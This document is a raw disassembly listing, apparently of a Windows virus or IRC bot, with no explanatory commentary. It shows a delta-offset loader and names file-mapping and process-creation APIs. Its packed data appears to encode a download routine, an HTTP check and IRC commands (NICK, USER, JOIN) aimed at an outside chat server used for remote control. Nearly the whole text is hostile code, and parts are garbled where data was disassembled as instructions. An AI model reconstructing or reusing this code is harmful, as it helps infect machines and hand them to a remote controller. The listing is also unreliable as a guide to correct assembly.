; CODE XREF: sub_3144117E+8Bj cmp dword ptr [ebp+103E82h], 0 jz loc_31441524 call near ptr loc_314412FA+1 dec esi push esp inc esp dec esp dec esp loc_314412FA: ; CODE XREF: sub_3144117E+172p add bh, bh sub_3144117E endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al lea esi, [ebp+1017CEh] xor ecx, ecx lea edi, [ebp+103EEAh] mov cl, 0Eh xchg eax, ebx call sub_3144158C cmp dword ptr [ebp+103F1Eh], 0 jz loc_31441524 mov eax, [ebp+103EEEh] push dword ptr [eax+1] pop dword ptr [ebp+103907h] mov eax, [ebp+103F06h] push dword ptr [eax+1] pop dword ptr [ebp+103954h] mov eax, [ebp+103EF2h] push dword ptr [eax+1] pop dword ptr [ebp+10395Bh] mov ecx, [ebp+103EF6h] jecxz short loc_31441373 push dword ptr [ecx+1] pop dword ptr [ebp+103968h] mov ecx, [ebp+103EFEh] jecxz short loc_31441373 push dword ptr [ecx+1] pop dword ptr [ebp+103975h] loc_31441373: ; CODE XREF: UPX2:31441357j ; UPX2:31441368j call sub_31441530 lea edi, [ebp+103F74h] mov ecx, edi push 0 neg cl push dword ptr [eax+4] and ecx, 3 push 40h add edi, ecx push edi push 0 push 18h lea esi, [ebp+1015DBh] mov ecx, 19h lea eax, ds:0FFFFFFFEh[ecx*2] stosw lea eax, ds:0[ecx*2] stosw lea eax, [edi+4] stosd xor ah, ah lea edx, [ebp+103E20h] loc_314413BC: ; CODE XREF: UPX2:314413C5j lodsb mov [edx], ax stosw add edx, 2 loop loc_314413BC mov edx, esp push 0 push 7318h mov ecx, esp push 0 mov eax, esp push 0 push 8000000h push 40h push ecx push edx push 0Eh push eax call dword ptr [ebp+103EFAh] pop eax add esp, 40h push 7318h mov edx, esp push 0 mov ecx, esp push 40h push 0 push 2 push edx push 0 push 7318h push 0 push ecx push 0FFFFFFFFh push eax call dword ptr [ebp+103F02h] pop edi pop ecx test edi, edi jz loc_31441524 lea esi, [ebp+101000h] mov ecx, 0CC6h mov ebp, edi rep movsd sub ebp, 101000h lea eax, [ebp+10143Ah] jmp eax ; --------------------------------------------------------------------------- dw 5450h dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h dd 103E52h ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3144117E loc_31441524: ; CODE XREF: sub_3144117E+1Fj ; sub_3144117E+B2j ... call dword ptr [ebp+103E52h] jmp loc_314410F0 ; END OF FUNCTION CHUNK FOR sub_3144117E ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31441530 proc near ; CODE XREF: UPX2:loc_31441373p ; sub_3144154F+2p pop edx push 0 push 0 push 0 push 0 push 40001h mov eax, esp push 0 push eax push 0Ch mov eax, esp jmp edx sub_31441530 endp ; --------------------------------------------------------------------------- aVx_4_1 db 'Vx_4',0 db 0 ; =============== S U B R O U T I N E ======================================= sub_3144154F proc near ; CODE XREF: sub_3144117E+9p xor ecx, ecx call sub_31441530 lea edx, [ebp+101549h] push edx push ecx push ecx push eax call dword ptr [ebp+103E56h] add esp, 20h retn sub_3144154F endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 dd 585858h, 3318h, 0E63h, 3 dup(0) dd 29B0h, 0 ; =============== S U B R O U T I N E ======================================= sub_3144158C proc near ; CODE XREF: sub_3144117E+7Cp ; UPX2:31441312p ... push ecx push esi push ebx call dword ptr [ebp+103E5Eh] stosd pop ecx loc_31441597: ; CODE XREF: sub_3144158C+Ej lodsb test al, al jnz short loc_31441597 loop sub_3144158C retn sub_3144158C endp ; =============== S U B R O U T I N E ======================================= sub_3144159F proc near ; CODE XREF: sub_3144311D+25p ; FUNCTION CHUNK AT 31441629 SIZE 000003C0 BYTES ; FUNCTION CHUNK AT 314419F9 SIZE 00000027 BYTES lea edx, [ebp+101975h] push edx call dword ptr [ebp+103EB6h] mov [ebp+104278h], eax call near ptr loc_314415CC+1 dec esp outsd outsd imul esi, [ebp+70h], 50h jb short loc_31441629 jbe short near ptr loc_31441629+2 insb db 65h, 67h, 65h push esi popa insb jnz short loc_31441630 inc ecx loc_314415CC: ; CODE XREF: sub_3144159F+13p add [eax-1], dl sub_3144159F endp ; sp-analysis failed xchg eax, ebp pop esi db 3Eh adc [eax], al mov [ebp+10427Ch], eax retn ; --------------------------------------------------------------------------- db 5Ch ; \ db 42h ; B db 61h ; a db 73h ; s db 65h ; e db 4Eh ; N db 61h ; a db 6Dh ; m db 65h ; e db 64h ; d db 4Fh ; O db 62h ; b db 6Ah ; j db 65h ; e db 63h ; c db 74h ; t db 73h ; s db 5Ch ; \ db 56h ; V db 74h ; t db 53h ; S db 65h ; e db 63h ; c db 74h ; t db 0 db 6Ch ; l db 73h ; s db 74h ; t db 72h ; r db 6Ch ; l db 65h ; e db 6Eh ; n db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 4Dh ; M db 61h ; a db 70h ; p db 70h ; p db 69h ; i db 6Eh ; n db 67h ; g db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 50h ; P db 72h ; r db 6Fh ; o db 63h ; c db 65h ; e db 73h ; s db 73h ; s db 41h ; A ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3144159F loc_31441629: ; CODE XREF: sub_3144159F+1Fj ; sub_3144159F+21j add [ebx+72h], al db 65h popa jz short near ptr loc_31441693+2 loc_31441630: ; CODE XREF: sub_3144159F+2Aj push edx db 65h insd outsd jz short loc_3144169B push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314416A6+2 push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314416B2+3 push esp outsd outsd insb push 33706C65h xor dl, [ebx+6Eh] popa jo short near ptr loc_314416D1+1 push 4500746Fh js short loc_314416CF jz short near ptr loc_314416BB+1 push 64616572h add [esi+69h], al insb db 65h push esp imul ebp, [ebp+65h], 79536F54h jnb short loc_314416F0 db 65h insd push esp imul ebp, [ebp+65h], 65724600h db 65h dec esp imul esp, [edx+72h], 797261h inc edi db 65h jz short near ptr loc_314416D3+6 loc_31441693: ; CODE XREF: sub_3144159F+8Fj imul ebp, [ebp+41h], 69727474h loc_3144169B: ; CODE XREF: sub_3144159F+95j bound esi, [ebp+74h] db 65h jnb short loc_314416E2 add [edi+65h], al jz short near ptr loc_314416EB+1 loc_314416A6: ; CODE XREF: sub_3144159F+A2j imul ebp, [ebp+53h], 657A69h inc edi db 65h jz short loc_314416F8 loc_314416B2: ; CODE XREF: sub_3144159F+AFj imul ebp, [ebp+54h], 656D69h inc edi loc_314416BB: ; CODE XREF: sub_3144159F+C7j db 65h jz short near ptr loc_3144170A+1 outsd db 64h jnz short near ptr loc_31441729+5 db 65h dec eax popa outsb db 64h insb db 65h inc ecx add [edi+65h], al jz short near ptr loc_3144171D+6 loc_314416CF: ; CODE XREF: sub_3144159F+C5j db 65h insd loc_314416D1: ; CODE XREF: sub_3144159F+BEj jo short near ptr loc_31441717+2 loc_314416D3: ; CODE XREF: sub_3144159F+F1j imul ebp, [ebp+4Eh], 41656D61h add [edi+65h], al jz short near ptr loc_31441731+3 db 65h insd loc_314416E2: ; CODE XREF: sub_3144159F+FFj jo short near ptr loc_31441731+3 popa jz short near ptr loc_3144174E+1 inc ecx add [edi+65h], al loc_314416EB: ; CODE XREF: sub_3144159F+105j jz short loc_31441743 db 65h jb short near ptr loc_31441762+1 loc_314416F0: ; CODE XREF: sub_3144159F+DBj imul ebp, [edi+6Eh], 74654700h push esi loc_314416F8: ; CODE XREF: sub_3144159F+110j db 65h jb short near ptr loc_3144176C+2 imul ebp, [edi+6Eh], 417845h inc edi db 65h jz short near ptr loc_3144175B+1 outsd insb jnz short near ptr loc_31441771+6 loc_3144170A: ; CODE XREF: sub_3144159F:loc_314416BBj db 65h dec ecx outsb outsw jb short near ptr loc_3144177C+2 popa jz short near ptr loc_3144177C+1 outsd outsb inc ecx loc_31441717: ; CODE XREF: sub_3144159F:loc_314416D1j add [edi+ebp*2+61h], cl db 64h dec esp loc_3144171D: ; CODE XREF: sub_3144159F+12Ej imul esp, [edx+72h], 41797261h add [ebp+61h], cl jo short loc_3144177F loc_31441729: ; CODE XREF: sub_3144159F+120j imul esp, [ebp+77h], 6946664Fh insb loc_31441731: ; CODE XREF: sub_3144159F+13Fj ; sub_3144159F:loc_314416E2j add gs:[edi+70h], cl outs dx, byte ptr gs:[esi] inc esi imul ebp, [ebp+4Dh], 69707061h outsb db 67h inc ecx loc_31441743: ; CODE XREF: sub_3144159F:loc_314416EBj add [edi+70h], cl outs dx, byte ptr gs:[esi] push eax jb short near ptr loc_314417B9+1 arpl [ebp+73h], sp loc_3144174E: ; CODE XREF: sub_3144159F+146j jnb short $+2 push eax jb short loc_314417C2 arpl [ebp+73h], sp jnb short near ptr loc_31441784+7 xor al, [esi+69h] loc_3144175B: ; CODE XREF: sub_3144159F+164j jb short near ptr loc_314417CA+6 jz short $+2 push eax jb short near ptr loc_314417CA+7 loc_31441762: ; CODE XREF: sub_3144159F+14Ej arpl [ebp+73h], sp jnb short near ptr loc_31441799+1 xor cl, [esi+65h] js short near ptr loc_314417DC+4 loc_3144176C: ; CODE XREF: sub_3144159F:loc_314416F8j add [ebx+65h], dl jz short near ptr loc_314417B5+2 loc_31441771: ; CODE XREF: sub_3144159F+169j imul ebp, [ebp+41h], 69727474h bound esi, [ebp+74h] loc_3144177C: ; CODE XREF: sub_3144159F+173j ; sub_3144159F+170j db 65h jnb short loc_314417C0 loc_3144177F: ; CODE XREF: sub_3144159F+188j add [ebx+65h], dl jz short loc_314417CA loc_31441784: ; CODE XREF: sub_3144159F+1B7j imul ebp, [ebp+54h], 656D69h push ebx insb db 65h, 65h jo short $+4 push ebx jns short loc_31441808 jz short loc_314417FC insd push esp loc_31441799: ; CODE XREF: sub_3144159F+1C6j imul ebp, [ebp+65h], 69466F54h insb db 65h push esp imul ebp, [ebp+65h], 6D6E5500h popa jo short loc_31441803 imul esp, [ebp+77h], 6946664Fh insb loc_314417B5: ; CODE XREF: sub_3144159F+1D0j add gs:[esi+69h], dl loc_314417B9: ; CODE XREF: sub_3144159F+1AAj jb short near ptr loc_3144182E+1 jnz short loc_3144181E insb inc ecx insb loc_314417C0: ; CODE XREF: sub_3144159F:loc_3144177Cj insb outsd loc_314417C2: ; CODE XREF: sub_3144159F+1B2j arpl [eax], ax push edi jb short loc_31441830 jz short loc_3144182E inc esi loc_314417CA: ; CODE XREF: sub_3144159F+1E3j ; sub_3144159F:loc_3144175Bj ... imul ebp, [ebp+0], 6441744Eh push 75h jnb short loc_3144184A push eax jb short near ptr loc_3144183F+3 jbe short near ptr loc_3144183F+5 insb loc_314417DC: ; CODE XREF: sub_3144159F+1CBj db 65h, 67h, 65h jnb near ptr 1835h outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_3144182B+1 jb short near ptr loc_3144184F+1 popa jz short loc_31441853 inc esi imul ebp, [ebp+0], 7243744Eh db 65h popa jz short loc_31441860 push eax loc_314417FC: ; CODE XREF: sub_3144159F+1F6j jb short loc_3144186D arpl [ebp+73h], sp jnb short $+2 loc_31441803: ; CODE XREF: sub_3144159F+20Cj dec esi jz short near ptr loc_31441846+3 jb short loc_3144186D loc_31441808: ; CODE XREF: sub_3144159F+1F4j popa jz short loc_31441870 push eax jb short loc_3144187D arpl [ebp+73h], sp jnb short near ptr loc_31441853+5 js short $+2 dec esi jz short loc_3144185B jb short loc_3144187F popa jz short near ptr loc_3144187F+3 push ebx loc_3144181E: ; CODE XREF: sub_3144159F+21Cj arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl inc ebx jb short near ptr loc_3144188E+1 popa loc_3144182B: ; CODE XREF: sub_3144159F+248j jz short loc_31441892 push ebp loc_3144182E: ; CODE XREF: sub_3144159F+228j ; sub_3144159F:loc_314417B9j jnb short near ptr loc_31441894+1 loc_31441830: ; CODE XREF: sub_3144159F+226j jb short near ptr loc_3144187F+3 jb short loc_314418A3 arpl [ebp+73h], sp jnb short $+2 dec esi jz short loc_31441889 popa jo short near ptr loc_31441894+1 loc_3144183F: ; CODE XREF: sub_3144159F+238j ; sub_3144159F+23Aj imul esp, [ebp+77h], 6553664Fh loc_31441846: ; CODE XREF: sub_3144159F+265j arpl [ecx+ebp*2+6Fh], si loc_3144184A: ; CODE XREF: sub_3144159F+235j outsb add [esi+74h], cl dec edi loc_3144184F: ; CODE XREF: sub_3144159F+24Aj jo short loc_314418B6 outsb inc esi loc_31441853: ; CODE XREF: sub_3144159F+24Dj ; sub_3144159F+272j imul ebp, [ebp+0], 704F744Eh loc_3144185B: ; CODE XREF: sub_3144159F+277j outs dx, byte ptr gs:[esi] push eax jb short loc_314418CF loc_31441860: ; CODE XREF: sub_3144159F+25Aj arpl [ebp+73h], sp jnb short loc_314418B9 outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314418BB+1 loc_3144186D: ; CODE XREF: sub_3144159F:loc_314417FCj ; sub_3144159F+267j jo short near ptr loc_314418D3+1 outsb loc_31441870: ; CODE XREF: sub_3144159F+26Aj push ebx arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl push eax jb short near ptr loc_314418EB+1 loc_3144187D: ; CODE XREF: sub_3144159F+26Dj jz short near ptr loc_314418E3+1 loc_3144187F: ; CODE XREF: sub_3144159F+279j ; sub_3144159F+27Cj ... arpl [esi+edx*2+69h], si jb short loc_314418F9 jnz short near ptr loc_314418E7+1 insb dec ebp loc_31441889: ; CODE XREF: sub_3144159F+29Bj db 65h insd outsd jb short near ptr loc_31441904+3 loc_3144188E: ; CODE XREF: sub_3144159F+289j add [esi+74h], cl push ecx loc_31441892: ; CODE XREF: sub_3144159F:loc_3144182Bj jnz short loc_314418F9 loc_31441894: ; CODE XREF: sub_3144159F:loc_3144182Ej ; sub_3144159F+29Ej jb short near ptr loc_3144190E+1 dec ecx outsb outsw jb short near ptr loc_31441908+1 popa jz short loc_31441908 outsd outsb push esp outsd loc_314418A3: ; CODE XREF: sub_3144159F+293j imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314418FF+2 jb short loc_31441915 jz short near ptr loc_31441912+1 push esi imul esi, [edx+74h], 4D6C6175h loc_314418B6: ; CODE XREF: sub_3144159F:loc_3144184Fj db 65h insd outsd loc_314418B9: ; CODE XREF: sub_3144159F+2C4j jb short loc_31441934 loc_314418BB: ; CODE XREF: sub_3144159F+2CCj add [edx+74h], dl insb push ebp outsb imul esp, [ebx+6Fh], 74536564h jb short near ptr loc_31441931+2 outsb db 67h push esp outsd inc ecx loc_314418CF: ; CODE XREF: sub_3144159F+2BFj outsb jnb short near ptr loc_3144193A+1 push ebx loc_314418D3: ; CODE XREF: sub_3144159F:loc_3144186Dj jz short loc_31441947 imul ebp, [esi+67h], 41535700h push ebx jz short loc_31441940 jb short loc_31441955 jnz short near ptr loc_31441952+1 loc_314418E3: ; CODE XREF: sub_3144159F:loc_3144187Dj add [ebx+6Ch], ah outsd loc_314418E7: ; CODE XREF: sub_3144159F+2E6j jnb short loc_3144194E jnb short near ptr loc_31441959+1 loc_314418EB: ; CODE XREF: sub_3144159F+2DCj arpl [ebx+65h], bp jz short $+2 arpl [edi+6Eh], bp outsb arpl gs:[eax+eax+67h], si loc_314418F9: ; CODE XREF: sub_3144159F+2E4j ; sub_3144159F:loc_31441892j db 65h jz short near ptr loc_31441963+1 outsd jnb short near ptr loc_31441971+2 loc_314418FF: ; CODE XREF: sub_3144159F+309j bound edi, [ecx+6Eh] popa insd loc_31441904: ; CODE XREF: sub_3144159F+2EDj add gs:[edx+65h], dh loc_31441908: ; CODE XREF: sub_3144159F+2FEj ; sub_3144159F+2FBj arpl [esi+0], si jnb short near ptr loc_31441971+1 outsb loc_3144190E: ; CODE XREF: sub_3144159F:loc_31441894j add fs:[ebx+6Fh], dh loc_31441912: ; CODE XREF: sub_3144159F+30Dj arpl [ebx+65h], bp loc_31441915: ; CODE XREF: sub_3144159F+30Bj jz short $+2 dec ecx outsb jz short loc_31441980 jb short loc_3144198B db 65h jz short loc_31441963 insb outsd jnb short near ptr loc_31441988+1 dec eax popa outsb db 64h insb add gs:[ecx+6Eh], cl jz short loc_31441994 jb short near ptr loc_3144199E+1 loc_31441931: ; CODE XREF: sub_3144159F+329j db 65h jz short loc_3144197B loc_31441934: ; CODE XREF: sub_3144159F:loc_314418B9j db 65h jz short loc_3144197A outsd outsb outsb loc_3144193A: ; CODE XREF: sub_3144159F+331j arpl gs:[ebp+64h], si push ebx loc_31441940: ; CODE XREF: sub_3144159F+33Ej jz short near ptr loc_314419A2+1 jz short loc_314419A9 add [ecx+6Eh], cl loc_31441947: ; CODE XREF: sub_3144159F:loc_314418D3j jz short near ptr loc_314419AC+2 jb short loc_314419B9 db 65h jz short near ptr loc_3144199B+2 loc_3144194E: ; CODE XREF: sub_3144159F:loc_314418E7j jo short loc_314419B5 outsb inc ecx loc_31441952: ; CODE XREF: sub_3144159F+342j add [ecx+6Eh], cl loc_31441955: ; CODE XREF: sub_3144159F+340j jz short near ptr loc_314419BB+1 jb short loc_314419C7 loc_31441959: ; CODE XREF: sub_3144159F+34Aj db 65h jz short near ptr loc_314419AA+1 jo short loc_314419C3 outsb push ebp jb short near ptr loc_314419CC+2 inc ecx loc_31441963: ; CODE XREF: sub_3144159F+37Ej ; sub_3144159F:loc_314418F9j add [ecx+6Eh], cl jz short near ptr loc_314419CC+1 jb short loc_314419D8 db 65h jz short near ptr loc_314419BE+1 db 65h popa db 64h inc esi loc_31441971: ; CODE XREF: sub_3144159F+36Cj ; sub_3144159F+35Ej imul ebp, [ebp+0], 41564441h push eax loc_3144197A: ; CODE XREF: sub_3144159F:loc_31441934j dec ecx loc_3144197B: ; CODE XREF: sub_3144159F:loc_31441931j xor esi, [edx] db 2Eh inc esp dec esp loc_31441980: ; CODE XREF: sub_3144159F+37Aj dec esp add [edx+65h], dl db 67h inc ebx insb outsd loc_31441988: ; CODE XREF: sub_3144159F+383j jnb short near ptr loc_314419ED+2 dec ebx loc_3144198B: ; CODE XREF: sub_3144159F+37Cj db 65h jns short $+3 push edx db 65h, 67h dec edi jo short loc_314419F9 loc_31441994: ; CODE XREF: sub_3144159F+38Ej outsb dec ebx db 65h jns short near ptr loc_314419DC+2 js short loc_314419DC loc_3144199B: ; CODE XREF: sub_3144159F+3ACj add [edx+65h], dl loc_3144199E: ; CODE XREF: sub_3144159F+390j db 67h push ecx jnz short loc_31441A07 loc_314419A2: ; CODE XREF: sub_3144159F:loc_31441940j jb short near ptr loc_31441A1C+1 push esi popa insb jnz short near ptr loc_31441A0D+1 loc_314419A9: ; CODE XREF: sub_3144159F+3A3j inc ebp loc_314419AA: ; CODE XREF: sub_3144159F:loc_31441959j js short loc_314419ED loc_314419AC: ; CODE XREF: sub_3144159F:loc_31441947j add [edx+65h], dl db 67h push ebx db 65h jz short loc_31441A0A popa loc_314419B5: ; CODE XREF: sub_3144159F:loc_3144194Ej insb jnz short near ptr loc_31441A1C+1 inc ebp loc_314419B9: ; CODE XREF: sub_3144159F+3AAj js short loc_314419FC loc_314419BB: ; CODE XREF: sub_3144159F:loc_31441955j add [esi+33h], dl loc_314419BE: ; CODE XREF: sub_3144159F+3CBj imul byte ptr [edx+2] push esi push esi loc_314419C3: ; CODE XREF: sub_3144159F+3BDj mov edx, esp push 1 loc_314419C7: ; CODE XREF: sub_3144159F+3B8j push edx push dword ptr [edx+18h] push esi loc_314419CC: ; CODE XREF: sub_3144159F+3C7j ; sub_3144159F+3C1j call dword ptr [ebp+10427Ch] mov eax, esp push esi push esi push esi push eax loc_314419D8: ; CODE XREF: sub_3144159F+3C9j push esi push dword ptr [eax+18h] loc_314419DC: ; CODE XREF: sub_3144159F+3FAj ; sub_3144159F+3F7j call dword ptr [ebp+103EEAh] add esp, 10h pop esi retn 8 ; END OF FUNCTION CHUNK FOR sub_3144159F ; --------------------------------------------------------------------------- db 8Dh ; db 49h ; I db 0FBh ; db 2Bh ; + ; --------------------------------------------------------------------------- loc_314419ED: ; CODE XREF: sub_3144159F:loc_314419AAj ; sub_3144159F:loc_31441988j enter 6851h, 0 ; --------------------------------------------------------------------------- db 0 db 0 db 0E8h ; db 8Dh ; db 4Ch ; L db 24h ; $ db 3 db 6Ah ; j ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3144159F loc_314419F9: ; CODE XREF: sub_3144159F+3F3j add [edx+5], ch loc_314419FC: ; CODE XREF: sub_3144159F:loc_314419B9j push ecx push eax push ebx push 5 mov ecx, esp push eax mov edx, esp push eax loc_31441A07: ; CODE XREF: sub_3144159F+401j push esp push 40h loc_31441A0A: ; CODE XREF: sub_3144159F+412j push ecx push edx push ebx loc_31441A0D: ; CODE XREF: sub_3144159F+408j call dword ptr [ebp+103F12h] add esp, 0Ch call dword ptr [ebp+103F1Ah] loc_31441A1C: ; CODE XREF: sub_3144159F:loc_314419A2j ; sub_3144159F+417j add esp, 8 retn ; END OF FUNCTION CHUNK FOR sub_3144159F ; --------------------------------------------------------------------------- db 8Dh ; db 95h ; db 20h db 3Eh ; > db 10h db 0 db 33h ; 3 db 0C9h ; db 6Ah ; j db 0 db 52h ; R db 68h ; h db 30h ; 0 db 0 db 32h ; 2 db 0 db 8Bh ; db 0C4h ; db 51h ; Q db 51h ; Q db 6Ah ; j db 40h ; @ db 50h ; P db 51h ; Q db 6Ah ; j db 18h db 83h ; db 0C0h ; db 8 db 54h ; T db 6Ah ; j db 0Eh db 50h ; P db 0FFh db 95h ; db 0Eh db 3Fh ; ? db 10h db 0 db 83h ; db 0C4h ; db 20h db 33h ; 3 db 0D2h ; db 85h ; db 0C0h ; db 0Fh db 99h ; db 0C2h ; db 0F7h ; db 0DAh ; db 58h ; X db 23h ; # db 0C2h ; db 0C3h ; db 57h ; W db 33h ; 3 db 0FFh db 0E8h ; db 0C1h ; db 0FFh db 0FFh db 0FFh db 0Fh db 84h ; db 0A5h ; db 0 db 0 db 0 db 50h ; P db 68h ; h db 18h db 73h ; s db 0 db 0 db 8Bh ; db 0D4h ; db 6Ah ; j db 0 db 8Bh ; db 0CCh ; db 6Ah ; j db 40h ; @ db 68h ; h db 0 db 0 db 10h db 0 db 6Ah ; j db 2 db 52h ; R db 6Ah ; j db 0 db 68h ; h db 18h db 73h ; s db 0 db 0 db 6Ah ; j db 0 db 51h ; Q db 53h ; S db 50h ; P db 0FFh db 95h ; db 2 db 3Fh ; ? db 10h db 0 db 5Fh ; _ db 59h ; Y db 0FFh db 95h ; db 52h ; R db 3Eh ; > db 10h db 0 db 85h ; db 0FFh db 74h ; t db 71h ; q db 8Bh ; db 8Dh ; db 80h ; db 15h db 10h db 0 db 0E3h ; db 0Ch db 8Dh ; db 95h ; db 0 db 10h db 10h db 0 db 3 db 0D1h ; db 57h ; W db 53h ; S db 0FFh db 0D2h ; db 8Bh ; db 85h ; db 0EEh ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 6 db 29h ; ) db 0 db 0 db 0E8h ; db 2Bh ; + db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 6 db 3Fh ; ? db 10h db 0 db 8Dh ; db 8Fh ; db 53h ; S db 29h ; ) db 0 db 0 db 0E8h ; db 1Ah db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F2h ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 5Ah ; Z db 29h ; ) db 0 db 0 db 0E8h ; db 9 db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F6h ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 20h db 8Dh ; db 8Fh ; db 67h ; g db 29h ; ) db 0 db 0 db 0E8h ; db 0F4h ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 85h ; db 0FEh ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 0Bh db 8Dh ; db 8Fh ; db 74h ; t db 29h ; ) db 0 db 0 db 0E8h ; db 0DFh ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 0C7h ; db 5Fh ; _ db 0C3h ; db 55h ; U db 0E8h ; db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101B14h xor ecx, ecx lea eax, [ebp+101E9Fh] push ecx push esp push ecx push ecx push eax push ecx push ecx call dword ptr [ebp+103E7Eh] xchg eax, [esp] call dword ptr [ebp+103E52h] pop ebp retn 4 ; --------------------------------------------------------------------------- db 55h, 0E8h, 0 dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h dd 2007473h, 55500000h, 703C8972h, 69786F72h, 72692E6Dh dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62627075h dd 6F616D63h, 4553550Ah, 4A792052h, 204E494Fh, 72697626h dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h dd 103EAA95h, 1FE8C100h, 1E6A3C74h, 3E62B58Bh, 0AC590010h dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h dd 0E8FFFFFEh, 0Bh, 5F434653h, 